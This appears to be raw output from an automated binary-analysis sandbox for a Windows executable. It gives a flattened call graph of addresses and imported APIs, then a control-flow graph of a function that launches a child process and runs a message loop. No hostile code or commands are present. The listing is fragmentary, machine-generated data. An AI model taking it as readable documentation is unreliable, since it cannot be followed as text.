7ff70aef4464 17678->17679 17679->16365 17681 7ff70aef1268 17680->17681 17682 7ff70aef126f 17681->17682 17683 7ff70aef1297 17681->17683 17684 
7ff70aef2710 54 API calls 17682->17684 17686 7ff70aef12d4 17683->17686 17687 7ff70aef12b1 17683->17687 17685 7ff70aef1282 17684->17685 17685->17620 17690 7ff70aef12e6 17686->17690 17700 7ff70aef1309 memcpy_s 17686->17700 17688 7ff70af04f78 _get_daylight 11 API calls 17687->17688 17689 7ff70aef12b6 17688->17689 17691 7ff70aef2910 54 API calls 17689->17691 17692 7ff70af04f78 _get_daylight 11 API calls 17690->17692 17696 7ff70aef12cf __std_exception_destroy 17691->17696 17693 7ff70aef12eb 17692->17693 17695 7ff70aef2910 54 API calls 17693->17695 17694 7ff70af0040c _fread_nolock 53 API calls 17694->17700 17695->17696 17696->17620 17697 7ff70aef13cf 17698 7ff70aef2710 54 API calls 17697->17698 17698->17696 17699 7ff70af00b4c 76 API calls 17699->17700 17700->17694 17700->17696 17700->17697 17700->17699 17701 7ff70af00180 37 API calls 17700->17701 17701->17700 17703 7ff70aef45b0 108 API calls 17702->17703 17704 7ff70aef108c 17703->17704 17705 7ff70aef1094 17704->17705 17706 7ff70aef10a9 17704->17706 17707 7ff70aef2710 54 API calls 17705->17707 17708 7ff70af00744 73 API calls 17706->17708 17713 7ff70aef10a4 __std_exception_destroy 17707->17713 17709 7ff70aef10bf 17708->17709 17710 7ff70aef10e6 17709->17710 17711 7ff70aef10c3 17709->17711 17715 7ff70aef1122 17710->17715 17716 7ff70aef10f7 17710->17716 17712 7ff70af04f78 _get_daylight 11 API calls 17711->17712 17714 7ff70aef10c8 17712->17714 17713->17586 17717 7ff70aef2910 54 API calls 17714->17717 17719 7ff70aef1129 17715->17719 17727 7ff70aef113c 17715->17727 17718 7ff70af04f78 _get_daylight 11 API calls 17716->17718 17724 7ff70aef10e1 __std_exception_destroy 17717->17724 17720 7ff70aef1100 17718->17720 17721 7ff70aef1210 92 API calls 17719->17721 17722 7ff70aef2910 54 API calls 17720->17722 17721->17724 17722->17724 17723 7ff70af000bc 74 API calls 17725 7ff70aef11b4 17723->17725 17724->17723 17725->17713 17737 7ff70aef46e0 17725->17737 17726 7ff70af0040c _fread_nolock 53 API calls 17726->17727 17727->17724 17727->17726 
17728 7ff70aef11ed 17727->17728 17730 7ff70af04f78 _get_daylight 11 API calls 17728->17730 17731 7ff70aef11f2 17730->17731 17732 7ff70aef2910 54 API calls 17731->17732 17732->17724 17734 7ff70af00b7c 17733->17734 17751 7ff70af0089c 17734->17751 17736 7ff70af00b9a 17736->17624 17738 7ff70aef46f0 17737->17738 17739 7ff70aef9400 2 API calls 17738->17739 17740 7ff70aef471b 17739->17740 17741 7ff70aef9400 2 API calls 17740->17741 17750 7ff70aef478e 17740->17750 17742 7ff70aef4736 17741->17742 17744 7ff70aef473b CreateSymbolicLinkW 17742->17744 17742->17750 17743 7ff70aefc5c0 _log10_special 8 API calls 17745 7ff70aef47a9 17743->17745 17746 7ff70aef4765 17744->17746 17744->17750 17745->17713 17747 7ff70aef476e GetLastError 17746->17747 17746->17750 17747->17750 17750->17743 17752 7ff70af008bc 17751->17752 17753 7ff70af008e9 17751->17753 17752->17753 17754 7ff70af008c6 17752->17754 17755 7ff70af008f1 17752->17755 17753->17736 17756 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17754->17756 17758 7ff70af007dc 17755->17758 17756->17753 17765 7ff70af054dc EnterCriticalSection 17758->17765 17767 7ff70af050a1 17766->17767 17768 7ff70af050ce 17766->17768 17769 7ff70af04f78 _get_daylight 11 API calls 17767->17769 17778 7ff70af05058 17767->17778 17770 7ff70af050f1 17768->17770 17773 7ff70af0510d 17768->17773 17771 7ff70af050ab 17769->17771 17772 7ff70af04f78 _get_daylight 11 API calls 17770->17772 17774 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17771->17774 17775 7ff70af050f6 17772->17775 17781 7ff70af04fbc 17773->17781 17777 7ff70af050b6 17774->17777 17779 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17775->17779 17777->17632 17778->17632 17780 7ff70af05101 17779->17780 17780->17632 17782 7ff70af04fe0 17781->17782 17783 7ff70af04fdb 17781->17783 17782->17783 17784 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 17782->17784 17783->17780 17785 7ff70af04ffb 17784->17785 17789 7ff70af0d9f4 17785->17789 17790 7ff70af0da09 17789->17790 17792 7ff70af0501e 
17789->17792 17791 7ff70af13374 45 API calls 17790->17791 17790->17792 17791->17792 17793 7ff70af0da60 17792->17793 17794 7ff70af0da88 17793->17794 17795 7ff70af0da75 17793->17795 17794->17783 17795->17794 17796 7ff70af126c0 45 API calls 17795->17796 17796->17794 17798 7ff70aef4126 17797->17798 17799 7ff70af049f4 49 API calls 17798->17799 17801 7ff70aef414c 17799->17801 17800 7ff70aef415d 17800->17643 17801->17800 17802 7ff70aef4550 10 API calls 17801->17802 17803 7ff70aef416f 17802->17803 17803->17643 17805 7ff70aef7cf5 17804->17805 17806 7ff70aef45b0 108 API calls 17805->17806 17807 7ff70aef7d1b 17806->17807 17808 7ff70aef7d42 17807->17808 17809 7ff70aef45b0 108 API calls 17807->17809 17811 7ff70aefc5c0 _log10_special 8 API calls 17808->17811 17810 7ff70aef7d32 17809->17810 17812 7ff70aef7d3d 17810->17812 17813 7ff70aef7d4c 17810->17813 17814 7ff70aef4267 17811->17814 17815 7ff70af000bc 74 API calls 17812->17815 17834 7ff70af00154 17813->17834 17814->17650 17814->17655 17815->17808 17817 7ff70aef7daf 17818 7ff70af000bc 74 API calls 17817->17818 17820 7ff70aef7dd7 17818->17820 17819 7ff70af0040c _fread_nolock 53 API calls 17828 7ff70aef7d51 17819->17828 17822 7ff70aef7db6 17823 7ff70af00180 37 API calls 17822->17823 17825 7ff70aef7db1 17823->17825 17824 7ff70af00b4c 76 API calls 17824->17828 17825->17817 17840 7ff70af07388 17825->17840 17826 7ff70af00180 37 API calls 17826->17828 17828->17817 17828->17819 17828->17822 17828->17824 17828->17825 17828->17826 17829 7ff70af00154 37 API calls 17828->17829 17829->17828 17832 7ff70aef18d5 17830->17832 17833 7ff70aef1865 17830->17833 17831 7ff70af05094 45 API calls 17831->17833 17832->17669 17832->17670 17833->17831 17833->17832 17835 7ff70af0016d 17834->17835 17836 7ff70af0015d 17834->17836 17835->17828 17837 7ff70af04f78 _get_daylight 11 API calls 17836->17837 17838 7ff70af00162 17837->17838 17839 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17838->17839 17839->17835 17841 7ff70af07390 17840->17841 17862 
7ff70af05f38 17860->17862 17861 7ff70af05f5e 17863 7ff70af04f78 _get_daylight 11 API calls 17861->17863 17862->17861 17864 7ff70af05f91 17862->17864 17865 7ff70af05f63 17863->17865 17866 7ff70af05fa4 17864->17866 17867 7ff70af05f97 17864->17867 17868 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17865->17868 17879 7ff70af0ac98 17866->17879 17869 7ff70af04f78 _get_daylight 11 API calls 17867->17869 17871 7ff70aef4606 17868->17871 17869->17871 17871->16386 17892 7ff70af10348 EnterCriticalSection 17879->17892 18253 7ff70af07968 18252->18253 18256 7ff70af07444 18253->18256 18255 7ff70af07981 18255->16396 18257 7ff70af0745f 18256->18257 18258 7ff70af0748e 18256->18258 18259 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18257->18259 18266 7ff70af054dc EnterCriticalSection 18258->18266 18261 7ff70af0747f 18259->18261 18261->18255 18268 7ff70aeffeb3 18267->18268 18270 7ff70aeffee1 18267->18270 18269 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18268->18269 18271 7ff70aeffed3 18269->18271 18270->18271 18277 7ff70af054dc EnterCriticalSection 18270->18277 18271->16400 18279 7ff70aefcb62 RtlLookupFunctionEntry 18278->18279 18280 7ff70aefc97b 18279->18280 18281 7ff70aefcb78 RtlVirtualUnwind 18279->18281 18282 7ff70aefc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18280->18282 18281->18279 18281->18280 18284 7ff70aef45b0 108 API calls 18283->18284 18285 7ff70aef1493 18284->18285 18286 7ff70aef149b 18285->18286 18287 7ff70aef14bc 18285->18287 18289 7ff70aef2710 54 API calls 18286->18289 18288 7ff70af00744 73 API calls 18287->18288 18291 7ff70aef14d1 18288->18291 18290 7ff70aef14ab 18289->18290 18290->16442 18292 7ff70aef14d5 18291->18292 18293 7ff70aef14f8 18291->18293 18294 7ff70af04f78 _get_daylight 11 API calls 18292->18294 18297 7ff70aef1532 18293->18297 18298 7ff70aef1508 18293->18298 18295 7ff70aef14da 18294->18295 18296 7ff70aef2910 54 API calls 18295->18296 18312 7ff70aef14f3 __std_exception_destroy 
18296->18312 18299 7ff70aef154b 18297->18299 18300 7ff70aef1538 18297->18300 18301 7ff70af04f78 _get_daylight 11 API calls 18298->18301 18307 7ff70af0040c _fread_nolock 53 API calls 18299->18307 18308 7ff70aef15d6 18299->18308 18299->18312 18302 7ff70aef1210 92 API calls 18300->18302 18303 7ff70aef1510 18301->18303 18302->18312 18305 7ff70aef2910 54 API calls 18303->18305 18304 7ff70af000bc 74 API calls 18306 7ff70aef15c4 18304->18306 18305->18312 18306->16442 18307->18299 18309 7ff70af04f78 _get_daylight 11 API calls 18308->18309 18310 7ff70aef15db 18309->18310 18311 7ff70aef2910 54 API calls 18310->18311 18311->18312 18312->18304 18314 7ff70aef9400 2 API calls 18313->18314 18315 7ff70aef9084 LoadLibraryExW 18314->18315 18316 7ff70aef90a3 __std_exception_destroy 18315->18316 18316->16476 18390 7ff70aef6365 18389->18390 18391 7ff70aef1c80 49 API calls 18390->18391 18392 7ff70aef63a1 18391->18392 18393 7ff70aef63cd 18392->18393 18394 7ff70aef63aa 18392->18394 18396 7ff70aef4620 49 API calls 18393->18396 18395 7ff70aef2710 54 API calls 18394->18395 18397 7ff70aef63c3 18395->18397 18398 7ff70aef63e5 18396->18398 18402 7ff70aefc5c0 _log10_special 8 API calls 18397->18402 18399 7ff70aef6403 18398->18399 18400 7ff70aef2710 54 API calls 18398->18400 18401 7ff70aef4550 10 API calls 18399->18401 18400->18399 18404 7ff70aef640d 18401->18404 18403 7ff70aef336e 18402->18403 18403->16516 18420 7ff70aef64f0 18403->18420 18405 7ff70aef641b 18404->18405 18406 7ff70aef9070 3 API calls 18404->18406 18407 7ff70aef4620 49 API calls 18405->18407 18406->18405 18408 7ff70aef6434 18407->18408 18409 7ff70aef6459 18408->18409 18410 7ff70aef6439 18408->18410 18412 7ff70aef9070 3 API calls 18409->18412 18411 7ff70aef2710 54 API calls 18410->18411 18411->18397 18413 7ff70aef6466 18412->18413 18414 7ff70aef64b1 18413->18414 18415 7ff70aef6472 18413->18415 18479 7ff70aef5820 GetProcAddress 18414->18479 18416 7ff70aef9400 2 API calls 18415->18416 18418 7ff70aef648a GetLastError 18416->18418 18419 
7ff70aef2c50 51 API calls 18418->18419 18419->18397 18569 7ff70aef53f0 18420->18569 18422 7ff70aef6516 18423 7ff70aef652f 18422->18423 18424 7ff70aef651e 18422->18424 18576 7ff70aef4c80 18423->18576 18425 7ff70aef2710 54 API calls 18424->18425 18431 7ff70aef652a 18425->18431 18428 7ff70aef653b 18430 7ff70aef2710 54 API calls 18428->18430 18429 7ff70aef654c 18432 7ff70aef655c 18429->18432 18434 7ff70aef656d 18429->18434 18430->18431 18431->16512 18433 7ff70aef2710 54 API calls 18432->18433 18433->18431 18435 7ff70aef659d 18434->18435 18436 7ff70aef658c 18434->18436 18438 7ff70aef65bd 18435->18438 18439 7ff70aef65ac 18435->18439 18437 7ff70aef2710 54 API calls 18436->18437 18437->18431 18580 7ff70aef4d40 18438->18580 18441 7ff70aef2710 54 API calls 18439->18441 18441->18431 18458 7ff70aef6060 18457->18458 18459 7ff70aef6089 18458->18459 18465 7ff70aef60a0 __std_exception_destroy 18458->18465 18460 7ff70aef2710 54 API calls 18459->18460 18461 7ff70aef6095 18460->18461 18461->16514 18462 7ff70aef61ab 18462->16514 18463 7ff70aef1470 116 API calls 18463->18465 18464 7ff70aef2710 54 API calls 18464->18465 18465->18462 18465->18463 18465->18464 18480 7ff70aef5842 GetLastError 18479->18480 18481 7ff70aef586f GetProcAddress 18479->18481 18482 7ff70aef584f 18480->18482 18483 7ff70aef588b GetLastError 18481->18483 18484 7ff70aef589a GetProcAddress 18481->18484 18485 7ff70aef2c50 51 API calls 18482->18485 18483->18482 18486 7ff70aef58c5 GetProcAddress 18484->18486 18487 7ff70aef58b6 GetLastError 18484->18487 18488 7ff70aef5864 18485->18488 18489 7ff70aef58f3 GetProcAddress 18486->18489 18490 7ff70aef58e1 GetLastError 18486->18490 18487->18482 18488->18397 18491 7ff70aef5921 GetProcAddress 18489->18491 18492 7ff70aef590f GetLastError 18489->18492 18490->18482 18492->18482 18571 7ff70aef541c 18569->18571 18570 7ff70aef5424 18570->18422 18571->18570 18574 7ff70aef55c4 18571->18574 18600 7ff70af06b14 18571->18600 18572 7ff70aef5787 __std_exception_destroy 18572->18422 18573 
7ff70aef47c0 47 API calls 18573->18574 18574->18572 18574->18573 18577 7ff70aef4cb0 18576->18577 18578 7ff70aefc5c0 _log10_special 8 API calls 18577->18578 18579 7ff70aef4d1a 18578->18579 18579->18428 18579->18429 18601 7ff70af06b44 18600->18601 18604 7ff70af06010 18601->18604 18603 7ff70af06b74 18603->18571 18605 7ff70af06053 18604->18605 18606 7ff70af06041 18604->18606 18607 7ff70af0609d 18605->18607 18609 7ff70af06060 18605->18609 18608 7ff70af04f78 _get_daylight 11 API calls 18606->18608 18612 7ff70af04830 45 API calls 18607->18612 18615 7ff70af060b8 18607->18615 18610 7ff70af06046 18608->18610 18611 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18609->18611 18614 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18610->18614 18624 7ff70af06051 18611->18624 18612->18615 18614->18624 18617 7ff70af060da 18615->18617 18625 7ff70af06a9c 18615->18625 18616 7ff70af0617b 18618 7ff70af04f78 _get_daylight 11 API calls 18616->18618 18616->18624 18617->18616 18619 7ff70af04f78 _get_daylight 11 API calls 18617->18619 18620 7ff70af06226 18618->18620 18621 7ff70af06170 18619->18621 18622 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18620->18622 18623 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18621->18623 18622->18624 18623->18616 18624->18603 18626 7ff70af06abf 18625->18626 18628 7ff70af06ad6 18625->18628 18631 7ff70af0ffd8 18626->18631 18629 7ff70af06ac4 18628->18629 18636 7ff70af10008 18628->18636 18629->18615 18632 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 18631->18632 18633 7ff70af0ffe1 18632->18633 18637 7ff70af04fbc 45 API calls 18636->18637 18638 7ff70af10041 18637->18638 18677->16519 18679 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 18678->18679 18680 7ff70af0a451 18679->18680 18683 7ff70af0a574 18680->18683 18692 7ff70af136c0 18683->18692 18718 7ff70af13678 18692->18718 18723 7ff70af10348 EnterCriticalSection 18718->18723 19150 7ff70af17c90 19153 7ff70af12660 19150->19153 19154 7ff70af126b2 19153->19154 19155 7ff70af1266d 19153->19155 
19159 7ff70af0b294 19155->19159 19160 7ff70af0b2c0 FlsSetValue 19159->19160 19161 7ff70af0b2a5 FlsGetValue 19159->19161 19163 7ff70af0b2cd 19160->19163 19164 7ff70af0b2b2 19160->19164 19162 7ff70af0b2ba 19161->19162 19161->19164 19162->19160 19167 7ff70af0ec08 _get_daylight 11 API calls 19163->19167 19165 7ff70af0b2b8 19164->19165 19166 7ff70af0a574 __CxxCallCatchBlock 45 API calls 19164->19166 19179 7ff70af12334 19165->19179 19168 7ff70af0b335 19166->19168 19169 7ff70af0b2dc 19167->19169 19170 7ff70af0b2fa FlsSetValue 19169->19170 19171 7ff70af0b2ea FlsSetValue 19169->19171 19173 7ff70af0b318 19170->19173 19174 7ff70af0b306 FlsSetValue 19170->19174 19172 7ff70af0b2f3 19171->19172 19175 7ff70af0a9b8 __free_lconv_mon 11 API calls 19172->19175 19176 7ff70af0af64 _get_daylight 11 API calls 19173->19176 19174->19172 19175->19164 19177 7ff70af0b320 19176->19177 19178 7ff70af0a9b8 __free_lconv_mon 11 API calls 19177->19178 19178->19165 19202 7ff70af125a4 19179->19202 19181 7ff70af12369 19217 7ff70af12034 19181->19217 19184 7ff70af12386 19184->19154 19185 7ff70af0d66c _fread_nolock 12 API calls 19186 7ff70af12397 19185->19186 19187 7ff70af1239f 19186->19187 19189 7ff70af123ae 19186->19189 19188 7ff70af0a9b8 __free_lconv_mon 11 API calls 19187->19188 19188->19184 19189->19189 19224 7ff70af126dc 19189->19224 19192 7ff70af124aa 19193 7ff70af04f78 _get_daylight 11 API calls 19192->19193 19194 7ff70af124af 19193->19194 19197 7ff70af0a9b8 __free_lconv_mon 11 API calls 19194->19197 19195 7ff70af12505 19196 7ff70af1256c 19195->19196 19235 7ff70af11e64 19195->19235 19200 7ff70af0a9b8 __free_lconv_mon 11 API calls 19196->19200 19197->19184 19198 7ff70af124c4 19198->19195 19201 7ff70af0a9b8 __free_lconv_mon 11 API calls 19198->19201 19200->19184 19201->19195 19203 7ff70af125c7 19202->19203 19204 7ff70af125d1 19203->19204 19250 7ff70af10348 EnterCriticalSection 19203->19250 19207 7ff70af12643 19204->19207 19210 7ff70af0a574 __CxxCallCatchBlock 45 API calls 19204->19210 19207->19181 
19211 7ff70af1265b 19210->19211 19213 7ff70af126b2 19211->19213 19214 7ff70af0b294 50 API calls 19211->19214 19213->19181 19215 7ff70af1269c 19214->19215 19216 7ff70af12334 65 API calls 19215->19216 19216->19213 19218 7ff70af04fbc 45 API calls 19217->19218 19219 7ff70af12048 19218->19219 19220 7ff70af12054 GetOEMCP 19219->19220 19221 7ff70af12066 19219->19221 19223 7ff70af1207b 19220->19223 19222 7ff70af1206b GetACP 19221->19222 19221->19223 19222->19223 19223->19184 19223->19185 19225 7ff70af12034 47 API calls 19224->19225 19226 7ff70af12709 19225->19226 19227 7ff70af1285f 19226->19227 19229 7ff70af12746 IsValidCodePage 19226->19229 19234 7ff70af12760 memcpy_s 19226->19234 19228 7ff70aefc5c0 _log10_special 8 API calls 19227->19228 19230 7ff70af124a1 19228->19230 19229->19227 19231 7ff70af12757 19229->19231 19230->19192 19230->19198 19232 7ff70af12786 GetCPInfo 19231->19232 19231->19234 19232->19227 19232->19234 19251 7ff70af1214c 19234->19251 19307 7ff70af10348 EnterCriticalSection 19235->19307 19252 7ff70af12189 GetCPInfo 19251->19252 19261 7ff70af1227f 19251->19261 19257 7ff70af1219c 19252->19257 19252->19261 19253 7ff70aefc5c0 _log10_special 8 API calls 19254 7ff70af1231e 19253->19254 19254->19227 19255 7ff70af12eb0 48 API calls 19256 7ff70af12213 19255->19256 19262 7ff70af17bf4 19256->19262 19257->19255 19260 7ff70af17bf4 54 API calls 19260->19261 19261->19253 19263 7ff70af04fbc 45 API calls 19262->19263 19264 7ff70af17c19 19263->19264 19267 7ff70af178c0 19264->19267 19268 7ff70af17901 19267->19268 19269 7ff70af0f910 _fread_nolock MultiByteToWideChar 19268->19269 19272 7ff70af1794b 19269->19272 19270 7ff70af17bc9 19271 7ff70aefc5c0 _log10_special 8 API calls 19270->19271 19273 7ff70af12246 19271->19273 19272->19270 19274 7ff70af0d66c _fread_nolock 12 API calls 19272->19274 19276 7ff70af17983 19272->19276 19286 7ff70af17a81 19272->19286 19273->19260 19274->19276 19275 7ff70af0a9b8 __free_lconv_mon 11 API calls 19275->19270 19277 7ff70af0f910 _fread_nolock 
MultiByteToWideChar 19276->19277 19276->19286 19278 7ff70af179f6 19277->19278 19278->19286 19298 7ff70af0f154 19278->19298 19281 7ff70af17a41 19284 7ff70af0f154 __crtLCMapStringW 6 API calls 19281->19284 19281->19286 19282 7ff70af17a92 19283 7ff70af0d66c _fread_nolock 12 API calls 19282->19283 19285 7ff70af17b64 19282->19285 19288 7ff70af17ab0 19282->19288 19283->19288 19284->19286 19285->19286 19287 7ff70af0a9b8 __free_lconv_mon 11 API calls 19285->19287 19286->19270 19286->19275 19287->19286 19288->19286 19289 7ff70af0f154 __crtLCMapStringW 6 API calls 19288->19289 19290 7ff70af17b30 19289->19290 19290->19285 19291 7ff70af17b50 19290->19291 19292 7ff70af17b66 19290->19292 19293 7ff70af10858 WideCharToMultiByte 19291->19293 19294 7ff70af10858 WideCharToMultiByte 19292->19294 19295 7ff70af17b5e 19293->19295 19294->19295 19295->19285 19296 7ff70af17b7e 19295->19296 19296->19286 19297 7ff70af0a9b8 __free_lconv_mon 11 API calls 19296->19297 19297->19286 19299 7ff70af0ed80 __crtLCMapStringW 5 API calls 19298->19299 19300 7ff70af0f192 19299->19300 19301 7ff70af0f19a 19300->19301 19304 7ff70af0f240 19300->19304 19301->19281 19301->19282 19301->19286 19303 7ff70af0f203 LCMapStringW 19303->19301 19305 7ff70af0ed80 __crtLCMapStringW 5 API calls 19304->19305 19306 7ff70af0f26e __crtLCMapStringW 19305->19306 19306->19303 20450 7ff70af0c590 20461 7ff70af10348 EnterCriticalSection 20450->20461 18780 7ff70af05698 18781 7ff70af056b2 18780->18781 18782 7ff70af056cf 18780->18782 18783 7ff70af04f58 _fread_nolock 11 API calls 18781->18783 18782->18781 18784 7ff70af056e2 CreateFileW 18782->18784 18785 7ff70af056b7 18783->18785 18786 7ff70af05716 18784->18786 18787 7ff70af0574c 18784->18787 18789 7ff70af04f78 _get_daylight 11 API calls 18785->18789 18805 7ff70af057ec GetFileType 18786->18805 18831 7ff70af05c74 18787->18831 18792 7ff70af056bf 18789->18792 18796 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18792->18796 18794 7ff70af05755 18799 7ff70af04eec _fread_nolock 11 API 
calls 18794->18799 18795 7ff70af05780 18852 7ff70af05a34 18795->18852 18800 7ff70af056ca 18796->18800 18797 7ff70af05741 CloseHandle 18797->18800 18798 7ff70af0572b CloseHandle 18798->18800 18804 7ff70af0575f 18799->18804 18804->18800 18806 7ff70af0583a 18805->18806 18807 7ff70af058f7 18805->18807 18808 7ff70af05866 GetFileInformationByHandle 18806->18808 18812 7ff70af05b70 21 API calls 18806->18812 18809 7ff70af05921 18807->18809 18810 7ff70af058ff 18807->18810 18813 7ff70af05912 GetLastError 18808->18813 18814 7ff70af0588f 18808->18814 18811 7ff70af05944 PeekNamedPipe 18809->18811 18830 7ff70af058e2 18809->18830 18810->18813 18815 7ff70af05903 18810->18815 18811->18830 18816 7ff70af05854 18812->18816 18819 7ff70af04eec _fread_nolock 11 API calls 18813->18819 18817 7ff70af05a34 51 API calls 18814->18817 18818 7ff70af04f78 _get_daylight 11 API calls 18815->18818 18816->18808 18816->18830 18821 7ff70af0589a 18817->18821 18818->18830 18819->18830 18820 7ff70aefc5c0 _log10_special 8 API calls 18822 7ff70af05724 18820->18822 18869 7ff70af05994 18821->18869 18822->18797 18822->18798 18825 7ff70af05994 10 API calls 18826 7ff70af058b9 18825->18826 18827 7ff70af05994 10 API calls 18826->18827 18828 7ff70af058ca 18827->18828 18829 7ff70af04f78 _get_daylight 11 API calls 18828->18829 18828->18830 18829->18830 18830->18820 18832 7ff70af05caa 18831->18832 18833 7ff70af05d42 __std_exception_destroy 18832->18833 18834 7ff70af04f78 _get_daylight 11 API calls 18832->18834 18835 7ff70aefc5c0 _log10_special 8 API calls 18833->18835 18836 7ff70af05cbc 18834->18836 18837 7ff70af05751 18835->18837 18838 7ff70af04f78 _get_daylight 11 API calls 18836->18838 18837->18794 18837->18795 18839 7ff70af05cc4 18838->18839 18840 7ff70af07e78 45 API calls 18839->18840 18841 7ff70af05cd9 18840->18841 18842 7ff70af05ce1 18841->18842 18843 7ff70af05ceb 18841->18843 18844 7ff70af04f78 _get_daylight 11 API calls 18842->18844 18845 7ff70af04f78 _get_daylight 11 API calls 18843->18845 18851 7ff70af05ce6 
18844->18851 18846 7ff70af05cf0 18845->18846 18846->18833 18847 7ff70af04f78 _get_daylight 11 API calls 18846->18847 18848 7ff70af05cfa 18847->18848 18849 7ff70af07e78 45 API calls 18848->18849 18849->18851 18850 7ff70af05d34 GetDriveTypeW 18850->18833 18851->18833 18851->18850 18854 7ff70af05a5c 18852->18854 18853 7ff70af0578d 18862 7ff70af05b70 18853->18862 18854->18853 18876 7ff70af0f794 18854->18876 18856 7ff70af05af0 18856->18853 18857 7ff70af0f794 51 API calls 18856->18857 18858 7ff70af05b03 18857->18858 18858->18853 18859 7ff70af0f794 51 API calls 18858->18859 18860 7ff70af05b16 18859->18860 18860->18853 18861 7ff70af0f794 51 API calls 18860->18861 18861->18853 18863 7ff70af05b8a 18862->18863 18864 7ff70af05bc1 18863->18864 18865 7ff70af05b9a 18863->18865 18866 7ff70af0f628 21 API calls 18864->18866 18867 7ff70af04eec _fread_nolock 11 API calls 18865->18867 18868 7ff70af05baa 18865->18868 18866->18868 18867->18868 18868->18804 18870 7ff70af059b0 18869->18870 18871 7ff70af059bd FileTimeToSystemTime 18869->18871 18870->18871 18873 7ff70af059b8 18870->18873 18872 7ff70af059d1 SystemTimeToTzSpecificLocalTime 18871->18872 18871->18873 18872->18873 18874 7ff70aefc5c0 _log10_special 8 API calls 18873->18874 18875 7ff70af058a9 18874->18875 18875->18825 18877 7ff70af0f7c5 18876->18877 18878 7ff70af0f7a1 18876->18878 18881 7ff70af0f7ff 18877->18881 18882 7ff70af0f81e 18877->18882 18878->18877 18879 7ff70af0f7a6 18878->18879 18880 7ff70af04f78 _get_daylight 11 API calls 18879->18880 18883 7ff70af0f7ab 18880->18883 18884 7ff70af04f78 _get_daylight 11 API calls 18881->18884 18885 7ff70af04fbc 45 API calls 18882->18885 18886 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18883->18886 18887 7ff70af0f804 18884->18887 18891 7ff70af0f82b 18885->18891 18888 7ff70af0f7b6 18886->18888 18889 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18887->18889 18888->18856 18890 7ff70af0f80f 18889->18890 18890->18856 18891->18890 18892 7ff70af1054c 51 API calls 18891->18892 
18892->18891

Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 0 7ff70aef8bd0-7ff70aef8d16 call 7ff70aefc8c0 call 7ff70aef9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c call 7ff70af05460 call 7ff70af0a4ec call 7ff70af0878c GetCommandLineW CreateProcessW 23 7ff70aef8d3d-7ff70aef8d79 RegisterClassW 0->23 24 7ff70aef8d18-7ff70aef8d38 GetLastError call 7ff70aef2c50 0->24 25 7ff70aef8d81-7ff70aef8dd5 CreateWindowExW 23->25 26 7ff70aef8d7b GetLastError 23->26 31 7ff70aef9029-7ff70aef904f call 7ff70aefc5c0 24->31 28 7ff70aef8ddf-7ff70aef8de4 ShowWindow 25->28 29 7ff70aef8dd7-7ff70aef8ddd GetLastError 25->29 26->25 32 7ff70aef8dea-7ff70aef8dfa WaitForSingleObject 28->32 29->32 34 7ff70aef8dfc 32->34 35 7ff70aef8e78-7ff70aef8e7f 32->35 37 7ff70aef8e00-7ff70aef8e03 34->37 38 7ff70aef8ec2-7ff70aef8ec9 35->38 39 7ff70aef8e81-7ff70aef8e91 WaitForSingleObject 35->39 42 7ff70aef8e05 GetLastError 37->42 43 7ff70aef8e0b-7ff70aef8e12 37->43 40 7ff70aef8fb0-7ff70aef8fc9 GetMessageW 38->40 41 7ff70aef8ecf-7ff70aef8ee5 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff70aef8fe8-7ff70aef8ff2 39->44 45 7ff70aef8e97-7ff70aef8ea7 TerminateProcess 39->45 50 7ff70aef8fdf-7ff70aef8fe6 40->50 51 7ff70aef8fcb-7ff70aef8fd9 TranslateMessage DispatchMessageW 40->51 48 7ff70aef8ef0-7ff70aef8f28 MsgWaitForMultipleObjects PeekMessageW 41->48 42->43 43->39 49 7ff70aef8e14-7ff70aef8e31 PeekMessageW 43->49 52 7ff70aef8ff4-7ff70aef8ffa DestroyWindow 44->52 53 7ff70aef9001-7ff70aef9025 GetExitCodeProcess CloseHandle * 2 44->53 46 7ff70aef8eaf-7ff70aef8ebd WaitForSingleObject 45->46 47 7ff70aef8ea9 GetLastError 45->47 46->44 47->46 54 7ff70aef8f63-7ff70aef8f6a 48->54 55 7ff70aef8f2a 48->55 56 
7ff70aef8e66-7ff70aef8e76 WaitForSingleObject 49->56 57 7ff70aef8e33-7ff70aef8e64 TranslateMessage DispatchMessageW PeekMessageW 49->57 50->40 50->44 51->50 52->53 53->31 54->40 59 7ff70aef8f6c-7ff70aef8f95 QueryPerformanceCounter 54->59 58 7ff70aef8f30-7ff70aef8f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->35 56->37 57->56 57->57 58->54 58->58 59->48 60 7ff70aef8f9b-7ff70aef8fa2 59->60 60->44 61 7ff70aef8fa4-7ff70aef8fa8 60->61 61->40
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
